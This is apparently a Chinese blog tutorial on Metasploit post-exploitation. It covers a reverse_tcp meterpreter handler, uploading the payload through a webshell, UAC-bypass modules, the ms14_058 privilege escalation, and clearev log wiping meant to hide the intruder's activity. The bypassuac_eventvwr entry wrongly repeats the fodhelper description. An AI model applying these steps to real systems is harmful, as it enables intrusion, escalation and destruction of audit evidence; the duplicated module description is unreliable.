1. 程式人生 > >metaspolit下UAC提權以及日誌清除

metaspolit下UAC提權以及日誌清除

在獲得webshell時但許可權不夠大,這時候為了完全獲得受害者機器的許可權,使用msf進行後滲透。 # 一、獲取Meterpreter會話 Meterpreter 是msf的一個payload,目標執行之後,我們會得到一個會話,和常見的shell會話類似,但是它的功能更加強大,它是執行後滲透測試的實施通道。 ## (1) 使用msfvenom生成payload 常用命令: ![](https://imgkr.cn-bj.ufileos.com/94cb3225-234e-4639-bd7e-9ed05719865f.png) ## (2)本地監聽 監聽需要用到msf的exploit/multi/handler模組,使用show options檢視需要設定的引數。重要的引數有三個:監聽使用的payload、本地ip、本地監聽埠。這些引數的值跟之前msfvenom使用的引數一樣。 Msfconsole 開啟Metaploit ![](https://imgkr.cn-bj.ufileos.com/cf47e659-5a0a-4efe-b093-c74ebb008c85.png) ``` msf>use exploit/multi/handler ``` ![](https://imgkr.cn-bj.ufileos.com/7401752a-a560-444f-bb78-6db0d443dda2.png) ``` set payload windows/meterpreter/reverse_tcp ``` ![](https://imgkr.cn-bj.ufileos.com/7a158782-0bcc-463e-8635-d5e8949fe7d4.png) ``` set LHOST 192.168.204.129 ``` ![](https://imgkr.cn-bj.ufileos.com/b653c830-83bb-4f3e-983b-eddcf4407691.png) ## (3)將生成的payload通過webshell上傳到伺服器,要上傳到可讀寫的區域並執行 ![](https://imgkr.cn-bj.ufileos.com/3a3e4b91-a45c-4b1c-a394-54fa9c6e9d7c.png) 成功監聽獲得meterpreter(一個session(會話)) ![](https://imgkr.cn-bj.ufileos.com/c014df9b-8704-4e84-9dbd-a5d6ea8eed44.png) Getuid 檢視主機名 ![](https://imgkr.cn-bj.ufileos.com/67fdab73-6c32-4bde-931f-02ef7e4da48a.png) 也可以輸入shell變成命令列模式,輸入exit返回到meterpeter shell模式 ![](https://imgkr.cn-bj.ufileos.com/b986ad94-4845-4b0d-9740-6e3c994eb326.png) ![](https://imgkr.cn-bj.ufileos.com/aecec37a-27a2-4226-802a-c54c3468d108.png) 輸入background命令讓當前會話儲存到後臺 ![](https://imgkr.cn-bj.ufileos.com/d52b239a-7918-4e39-967c-529ad9009fad.png) 使用sessions命令可以檢視所有後臺的會話,每個session對應一個id值,後面會經常用到。 ![](https://imgkr.cn-bj.ufileos.com/930f0ca6-39e3-4f61-8a38-e71a87b04cc2.png) ## (4)Exploit 進行提權(UAC提權) 使用者帳戶控制(UAC)是微軟在 Windows Vista 以後版本引入的一種安全機制,有助於防止對系統進行未經授權的更改。應用程式和任務可始終在非管理員帳戶的安全上下文中執行,除非管理員專門給系統授予管理員級別的訪問許可權。UAC 可以阻止未經授權的應用程式進行自動安裝,並防止無意中更改系統設定。 msf提供了bypassuac模組幫助繞過UAC: ![](https://imgkr.cn-bj.ufileos.com/0aa38aeb-a5ce-453b-823b-ccc93ae3873a.png) 在使用bypassuac模組進行提權時,當前使用者必須在管理員組中,且UAC必須為預設設定(既“僅在程式試圖更改我的計算機時通知我”),bypassuac模組執行時,會在目標機器上建立多個檔案,這些檔案很有可能會被防毒軟體識別。 ### bypassuac模組介紹 `use exploit/windows/local/bypassuac` #該模組執行時會因為在目標機上建立多個檔案而被防毒軟體識別,因此通過該模組提權成功率很低。 `use exploit/windows/local/bypassuac_injection` #該模組直接執行在記憶體的反射DLL中,所以不會接觸目標機器的硬碟,從而降低了被防毒軟體檢測出來的概率 `use exploit/windows/local/bypassuac_fodhelper` # 該模組通過在當前使用者配置單元下劫持登錄檔中的特殊鍵,並插入將在啟動Windows fodhelper.exe應用程式時呼叫的自定義命令來繞過Windows 10 UAC `use exploit/windows/local/bypassuac_eventvwr` #該模組通過在當前使用者配置單元下劫持登錄檔中的特殊鍵,並插入將在啟動Windows fodhelper.exe應用程式時呼叫的自定義命令來繞過Windows 10 UAC `use exploit/windows/local/bypassuac_comhijack` #此模組將通過在HKCU配置單元中,建立COM處理程式登錄檔項來繞過Windows UAC。當載入某些高完整性程序時將會引用這些登錄檔項,從而導致程序載入使用者控制的DLL。這些DLL中包含了可提升許可權的payload。該模組需要通過目標系統上的cmd.exe來呼叫目標二進位制檔案,因此如果限制cmd.exe訪問,則此模組將無法正常執行。 `use exploit/windows/local/bypassuac_windows_store` #通過模擬可信目錄繞過UAC `use exploit/windows/local/bypassuac_sdclt` #Sdclt用於Windows備份和還原機制的上下文中 #### 1.第一次嘗試三個模組都無法獲得許可權 因為webshell許可權只是user,這需要許可權在adminisartor組中 ![](https://imgkr.cn-bj.ufileos.com/10c2002a-43d5-4e33-9f0a-e32738456157.png) ![](https://imgkr.cn-bj.ufileos.com/a809616e-32db-4f21-9979-81a1efcfe11e.png) ![](https://imgkr.cn-bj.ufileos.com/8284f6db-b682-4c7f-bc28-6ca5f95e43ff.png) bypassuac 執行成功後會返回一個新的 meterpreter,此時再輸入 shell 進入系統 cmd 檢視許可權,許可權級別已經由 medium 變成了 high。 除此之外還有很多其他的提權指令碼,可以根據 systeminfo 查出來的補丁和提權指令碼做對比,若相關的利用指令碼沒有安裝相應的補丁,則可針對性的進行提權操作。 這裡用bypassuac_injection成功提權 ![](https://imgkr.cn-bj.ufileos.com/8836275e-5b6e-454f-b349-6e894f7b6a4b.png) 但是對新版的的win10沒有一個可以成功繞過。 #### 2.也可以嘗試使用windwos的漏洞進行提權,可以用metaspolit的內建模組 ``` use post/windows/gather/enum_patches post/multi/recon/local_exploit_suggester ``` `set session id `#id是已經獲得的session號 當我們用它來探測某一個系統時,他會告訴我們該系統有哪些exploit可能可以利用 ``` use post/multi/recon/local_exploit_suggester ``` ![](https://imgkr.cn-bj.ufileos.com/b5932130-61ff-4597-89ab-fdff5a4d9f12.png) 詳細利用在另一篇[文章](https://www.cnblogs.com/Xy--1/p/12584336.html) 發現可能的漏洞後可以找到對應exp的模組: 如ms13_053,ms14_058,ms16_016,ms16_032等。下面以ms14_058為例。 ``` msf5 > use exploit/windows/local/ms14_058_track_popup_menu msf5 > exploit(ms14_058_track_popup_menu) > set session 1 msf5 > exploit(ms14_058_track_popup_menu) > exploit ``` ![](https://imgkr.cn-bj.ufileos.com/fcb497b1-85e2-4b7f-b9d3-6781754354a6.png) # 日誌清除 清除日誌 再進入肉雞執行一些操作時,windows 下記錄的操作日誌可在日誌檢視器中進行檢視,可以通過執行 eventvwr 命令開啟。 包括了應用程式、系統、安全等模組的日誌,為了不讓其查到自己或知道自己的操作,則可以使用 meterpreter 的 clearev 命令來清除其日誌。 未清除日誌前可檢視系統記錄的一些處理資訊。 ![](https://imgkr.cn-bj.ufileos.com/57aef830-4ca4-4e1b-93f5-95802699500f.png) 然後在 meterpreter 下執行 clearev 命令,可以看到清除提示,分別清除了應用程式,系統和安全模組的日誌記錄。 ![](https://imgkr.cn-bj.ufileos.com/94e898f0-cbaf-4d68-892f-f2a697475f64.png) 命令執行後,再到靶機的日誌檢視器中檢視,日誌已經被清除。 ![](https://imgkr.cn-bj.ufileos.com/99ebfc89-aa12-4c6c-b459-bb1669c733